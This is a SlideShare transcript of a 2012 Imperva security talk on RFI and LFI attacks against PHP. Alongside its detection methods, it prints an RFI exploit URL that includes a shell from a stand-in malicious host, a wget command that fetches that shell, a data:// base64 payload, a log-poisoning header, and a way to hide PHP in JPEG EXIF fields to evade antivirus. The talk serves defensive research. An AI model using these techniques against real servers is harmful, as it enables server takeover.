How to Prevent RFI and LFI Attacks

7,114 views

Published on

Did you know remote and local file inclusion (RFI/LFI) was among the four most prevalent Web application attacks in 2011? Why is RFI/LFI so attractive to hackers? Quite simply, with RFI/LFI a hacker can take over a Web server. RFI and LFI attacks primarily affect Web applications written in the PHP programming language. PHP is the most popular server-side programming language. In fact, PHP is used by 77.2% of today’s Web sites. This presentation looks at how hackers use RFI/LFI and avoid traditional detection techniques.

Published in: Technology
0 Comments
5 Likes
Statistics
Notes
  • Be the first to comment

No Downloads
Views
Total views
7,114
On SlideShare
0
From Embeds
0
Number of Embeds
8
Actions
Shares
0
Downloads
96
Comments
0
Likes
5
Embeds 0
No embeds

No notes for slide

How to Prevent RFI and LFI Attacks

  1. 1. How to Prevent Remote & Local File Inclusion AttacksTal Be’eryWeb Security Research Team Leader, Imperva
  2. 2. Tal Be’ery, CISSP  Web Security Research Team Leader at Imperva  Holds MSc & BSc degree in CS/EE from TAU  10+ experience in the IS domain  Facebook “white hat”  Speaker at RSA, BlackHat, AusCERT © 2012 Imperva, Inc. All rights reserved.
  3. 3. Contents  PHP Background and Internals  RFI Insight + Analysis of TimThumb shell “caught in the wild” + Advanced RFI using PHP streams and Wrappers  LFI Insight + Innovative method for editing file content to embed PHP code and evade AV detection + Novel detection method  RFI and LFI in the Wild + New detection method using community based reputation data  Questions and Answers 3 © 2012 Imperva, Inc. All rights reserved.
  4. 4. RFI, LFI - Under the Radar  PHP is everywhere  Exploiting PHP’s include vulnerabilities with RFI LFI attacks leads to full server takeover  Hackers are actively attacking organizations + TimThumb exploit reportedly compromised 1.2 million pages  And yet.. + OWASP Top 10 in 2007 (#3) + Dropped in 2010 © 2012 Imperva, Inc. All rights reserved.
  5. 5. Breadth and Depth of PHP  The most popular server-side programming language in the world! © 2012 Imperva, Inc. All rights reserved.
  6. 6. Breadth and Depth of PHP  Popular Web applications are powered by PHP © 2012 Imperva, Inc. All rights reserved.
  7. 7. PHP Internals - Parser HTML Mode  PHP’s parser starts on HTML mode  Ignores everything until it hits a PHPs opening tag + typically “<?php”, but also “<?”  PHP code is now parsed and compiled  When parser hits a closing tag (“?>”), it drops back to HTML mode  Allows “mixed” coding © 2012 Imperva, Inc. All rights reserved.
  8. 8. PHP Internals - PHP Execution Steps Parsing • Code is converted into tokens (Lexing)… • Tokens are processed into meaningful expressions (Parsing). Compiling • Derived expressions are converted into OpCodes. Execution • OpCodes are executed by the PHP engine. 8 © 2012 Imperva, Inc. All rights reserved.
  9. 9. PHP Internals - Disassembling with VLD Extension PHP Dumps the Extension Code is Vulcan Logic OpCodes of • http://pecl.php.net/ compiled but Disassembler complied package/vld not executed • Maintainers - Derick PHP scripts Rethans (lead) 9 © 2012 Imperva, Inc. All rights reserved.
  10. 10. PHP Internals - VLD Analysis Demo Compile © 2012 Imperva, Inc. All rights reserved.
  11. 11. PHP internals - Include()  The include() statement includes and evaluates the specified file  Used to share code by reference  PHP Version >=4.3 + Remote files (http://) are valid include targets  The parser drops to HTML mode at the beginning of the included file © 2012 Imperva, Inc. All rights reserved.
  12. 12. And You Thought Eval() is Evil…  Meet Eval()’s hungry sister – include()  Not only does she evaluate arbitrary code  She eats everything before code + HTML mode - Code can be prepended with anything (including binary content)  She loves dining out + Code can reside outside of the application © 2012 Imperva, Inc. All rights reserved.
  13. 13. RFI Exploitation  Simple vulnerable app for warm up  Exploit: + http://www.vulnerable.com/test.php?file=http://www.malicious. com/shell.txt © 2012 Imperva, Inc. All rights reserved.
  14. 14. RFI in the Wild14 © 2012 Imperva, Inc. All rights reserved.
  15. 15. Hacker Intel – Observations in the Wild  Hackers Intelligence Initiative (HII) + Initiated in 2010 + Goes deep inside the cyber-underground and provides analysis of trending hacking techniques and attack campaigns in real time + Includes honey pots consisting of 40 Web applications + Analyzes security logs © 2012 Imperva, Inc. All rights reserved.
  16. 16. RFI in the Wild - TimThumb  TimThumb - + A WordPress extension to produce thumbnails of images + Vulnerable to RFI + 1.2 million exploited pages © 2012 Imperva, Inc. All rights reserved.
  17. 17. TimThumb Exploit Analysis  Shell host - picasa.com.moveissantafe.com + Evaded TimThumb filter that allowed inclusion only from limited set of hosts + The implemented host check mistakenly allowed “picasa.com.moveissantafe.com” to pass as “picasa.com”  Started with a GIF file identifier, but then switched to encoded PHP + Evaded another TimThumb security filter used to verify that the file was indeed a valid picture © 2012 Imperva, Inc. All rights reserved.
  18. 18. TimThumb Exploit Analysis, Continued  Execution was controlled with additional HTTP parameters + LOL and OSC © 2012 Imperva, Inc. All rights reserved.
  19. 19. TimThumb Exploit Analysis, Continued  Execution was controlled with additional HTTP parameters + LOL and OSC © 2012 Imperva, Inc. All rights reserved.
  20. 20. TimThumb Exploit Analysis, Continued  Execution was controlled with additional HTTP parameters + LOL and OSC © 2012 Imperva, Inc. All rights reserved.
  21. 21. TimThumb Exploit Analysis, Continued  Execution was controlled with additional HTTP parameters + LOL and OSC © 2012 Imperva, Inc. All rights reserved.
  22. 22. Advanced RFI with PHP Streams22 © 2012 Imperva, Inc. All rights reserved.
  23. 23. Advanced RFI with PHP Streams  Streams are a way of generalizing file, network, data compression, and other operations  Examples: + Accessing HTTP(s) URLs - http:// https:// + Accessing FTP(s) URLs - ftp:// ftps:// + Data ( RFC 2397) - data:// + Accessing local filesystem - file:// + Accessing various I/O streams - php:// + Compression Streams - zlib:// , bzip2:// , zip:// © 2012 Imperva, Inc. All rights reserved.
  24. 24. RFI PHP Streams  Hacker’s objective + Run the following code <?php phpinfo(); ?> on RFI vulnerable app  Degree of difficulty + No shell hosting is allowed  Means + Bare hands © 2012 Imperva, Inc. All rights reserved.
  25. 25. RFI PHP Streams - Attack Example  base64(“<?php phpinfo()?>”) = "PD9waHAgcGhwaW5mbygpPz4="  Wrapped in data wrapper: + "data://text/plain;base64,PD9waHAgcGhwaW5mbygpPz4=" © 2012 Imperva, Inc. All rights reserved.
  26. 26. RFI PHP Streams - Attack Example, Continued © 2012 Imperva, Inc. All rights reserved.
  27. 27. RFI PHP Streams - Attack Example, Continued Mission Accomplished! © 2012 Imperva, Inc. All rights reserved.
  28. 28. PHP Streams - Why Hackers Use Them  To evade security filters + Many filters look only for exploits with the standard protocols  To hide attack source + Shell URL obfuscation (compressed, base64)  To compromise without a hosted shell + Using data wrapper © 2012 Imperva, Inc. All rights reserved.
  29. 29. Local File Inclusion29 © 2012 Imperva, Inc. All rights reserved.
  30. 30. LFI - Why Hackers Use It  LFI – malicious code must be stored locally  Extra work – why bother?  Because RFI is disabled by default + PHP version 5.2: allow_url_include = off + ~ 90% PHP deployments versions >=5.2 © 2012 Imperva, Inc. All rights reserved.
  31. 31. LFI - How to be Local  Abuse existing file write functionality within the server – log files  Abuse file upload functionality to embed malicious code within the uploaded file  Let’s demo it… © 2012 Imperva, Inc. All rights reserved.
  32. 32. LFI - Attacking Logs  Hacker’s objective + Run the following code <?php phpinfo(); ?>  Degree of difficulty + allow_url_include = off, code must be local  Means + Proxy (or any other way to edit HTTP headers) © 2012 Imperva, Inc. All rights reserved.
  33. 33. LFI - Attacking Logs Example Authorization: Basic base64(user:pass) = Authorization: Basic base64(<?php phpinfo()?>:123456) = Authorization: Basic PD9waHAgcGhwaW5mbygpPz46MTIzNTY=) © 2012 Imperva, Inc. All rights reserved.
  34. 34. LFI - Attacking Logs Example, Continued © 2012 Imperva, Inc. All rights reserved.
  35. 35. LFI - Attacking Logs Example, Continued Mission Accomplished! © 2012 Imperva, Inc. All rights reserved.
  36. 36. LFI - Abusing Upload  Hacker’s objective + Upload a picture with known malicious code to create LFI  Degree of difficulty + Picture appearance must not change + AV must not detect the code  Means + Bare hands © 2012 Imperva, Inc. All rights reserved.
  37. 37. LFI – Abusing Upload Example Initial PHP Code  <?php /* Fx29ID */ echo("FeeL"."CoMz"); die("FeeL"."CoMz"); /* Fx29ID */ ?>  Prints FeeLCoMz twice  Found in the wild  Detected by AVs © 2012 Imperva, Inc. All rights reserved.
  38. 38. LFI – Abusing Upload Example Embedding Code in Picture, Phase I  Picture – jpg format  Editing EXIF properties © 2012 Imperva, Inc. All rights reserved.
  39. 39. LFI – Abusing Upload Example Embedding Code in Picture, Phase I  Picture – jpg format  Editing EXIF properties Better… But not good enough! © 2012 Imperva, Inc. All rights reserved.
  40. 40. LFI – Abusing Upload Example Embedding Code in Picture, Phase II  Let’s split the vector across two adjacent properties © 2012 Imperva, Inc. All rights reserved.
  41. 41. LFI – Abusing Upload Example Embedding Code in Picture, Phase II  Let’s split the vector across two adjacent properties Better… But not good enough! © 2012 Imperva, Inc. All rights reserved.
  42. 42. LFI – Abusing Upload Example Embedding Code in Picture, Phase III  Now it gets personal  ClamAV signature PHP.Hide- 1 :0:0:ffd8ffe0?0104a464946{- 4000}3c3f706870(0d|20|0a)  3c3f706870 is hex for <?php.  Maybe changing the case will work… © 2012 Imperva, Inc. All rights reserved.
  43. 43. LFI – Abusing Upload Example, Recap  Hacker’s objective + Upload a picture with known malicious code to create LFI  Degree of difficulty + Picture appearance must not change + AV must not detect the code © 2012 Imperva, Inc. All rights reserved.
  44. 44. LFI – Abusing Upload Example, Recap  Hacker’s objective + Upload a picture with known malicious code to create LFI  Degree of difficulty + Picture appearance must not change + AV must not detect the code © 2012 Imperva, Inc. All rights reserved.
  45. 45. LFI – Abusing Upload Example, Recap  Hacker’s objective + Upload a picture with known malicious code to create LFI  Degree of difficulty + Picture appearance must not change + AV must not detect the Accomplished! Mission code © 2012 Imperva, Inc. All rights reserved.
  46. 46. LFI – Abusing Upload - Why AV Fails  General purpose AVs search only for malicious code. + In the context of LFI exploit detection we are OK with detecting files containing any PHP code.  General purpose AVs are built to find compiled malicious code. + Finding malicious source code requires a different set of features and awareness to text related evasions. © 2012 Imperva, Inc. All rights reserved.
  47. 47. LFI - Abusive File Upload Misdetection  Anti Virus - we just witnessed how they fail at this task  Degenerated PHP parser - Looks only for PHP begin/end tokens. + Looks for short tags (<?.*?>) - many false positives  Compile the uploaded file and check if it compiles + Even benign documents are (trivially) compiled  Run the file and see if it executes – hmm…  © 2012 Imperva, Inc. All rights reserved.
  48. 48. LFI - Abusive Upload File Detection  VLD it! + Compile the file with VLD + Inspect the OpCodes + No execution  A non-PHP code bearing files will yield only two OpCodes + ECHO – to print the non PHP code + RETURN – to return after the “execution” © 2012 Imperva, Inc. All rights reserved.
  49. 49. LFI - Abusive File Detection with VLD Demo © 2012 Imperva, Inc. All rights reserved.
  50. 50. RFI, LFI in the Wild50 © 2012 Imperva, Inc. All rights reserved.
  51. 51. RFI, LFI in the Wild  Very relevant + 20% of all Web application attacks  LFI is more prevalent than RFI + 90% of PHP deployments are of versions that do not allow RFI by default © 2012 Imperva, Inc. All rights reserved.
  52. 52. RFI in the Wild - Sources Analysis  Highly automated  Consistent attackers © 2012 Imperva, Inc. All rights reserved.
  53. 53. RFI in the Wild - Sources Analysis  Many sources attack more than one target © 2012 Imperva, Inc. All rights reserved.
  54. 54. RFI in the Wild - Shell Hosting URLs Analysis Obtaining shell hosting URLs:btaining shell hosting URLs: 1. Analyze Honey pot’s RFI Security Log entry http://www.vulnerable.com/test.php?file=http://www. malicious.com/shell.txt 2. Download the shell - wget http://www.malicious.com/shell.txt 3. Verify it’s a script – to refrain from false positives © 2012 Imperva, Inc. All rights reserved.
  55. 55. RFI in the Wild - Shell Hosting URLs Analysis  Some URLs are being used consistently © 2012 Imperva, Inc. All rights reserved.
  56. 56. RFI in the Wild - Shell Hosting URLs Analysis  Many shell URLs are used against more than one target © 2012 Imperva, Inc. All rights reserved.
  57. 57. A New Approach - Community Based RFI Black Lists  Attack characteristics (source, Shell URL) + Non transient – stable for days + General - not confined to a single honey pot  By forming a community that shares RFI data we can create black lists + Attack sources + Attackers’ shell hosting URLs  Achieve better protection! © 2012 Imperva, Inc. All rights reserved.
  58. 58. Additional Resources58 © 2012 Imperva, Inc. All rights reserved.
  59. 59. Hacker Intelligence Initiative  Subscribe to Imperva’s Hacker Intelligence Initiative (HII): + Sign up to stay informed on all the latest attacks and hacking techniques  Download HII RFI Resources: + Report: Remote File Inclusion (RFI) Vulnerabilities 101 + Infographic: Exploiting RFI Attacks 101 59 © 2012 Imperva, Inc. All rights reserved.
  60. 60. Presentation Materials Join Imperva’s LinkedIn Group Data Security Direct for… Post- Answers to Presentation Attendee Discussions Questions Link to Link to Presentation Presentation Audio Slides http://www.linkedin.com/groups/Imperva-Data-Security-Direct-3849609 © 2012 Imperva, Inc. All rights reserved.
  61. 61. www.imperva.com- CONFIDENTIAL -

×